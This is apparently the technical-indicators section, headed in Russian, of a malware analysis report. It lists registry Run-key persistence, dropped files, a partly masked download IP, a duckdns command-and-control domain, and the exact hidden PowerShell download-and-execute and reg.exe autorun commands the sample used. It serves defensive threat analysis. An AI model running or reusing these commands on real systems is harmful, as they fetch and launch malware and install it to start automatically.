Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'dhclinet' = '<SYSTEM32>\pcalua.exe -a %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\dhclinet.exe'
- %APPDATA%\microsoft\windows\start menu\programs\startup\dhclinet.exe
- http://91.##7.80.140/tyhy.exe как %appdata%\tyhy.exe
- addinprocess32.exe
- %TEMP%\abctfhghghghghž.sct
- %APPDATA%\tyhy.exe
- %TEMP%\addinprocess32.exe
- 'tw####s.duckdns.org':1710
- http://91.##7.80.140/tyhy.exe
- DNS ASK tw####s.duckdns.org
- '%APPDATA%\tyhy.exe'
- '%APPDATA%\microsoft\windows\start menu\programs\startup\dhclinet.exe'
- '%TEMP%\addinprocess32.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://91.##7.80.140/tyhy.exe','%APPDATA%\tyhy.exe');Start-Process '%APPDATA%...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v dhclinet /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\dhclinet...
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v dhclinet /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\dhclinet.exe"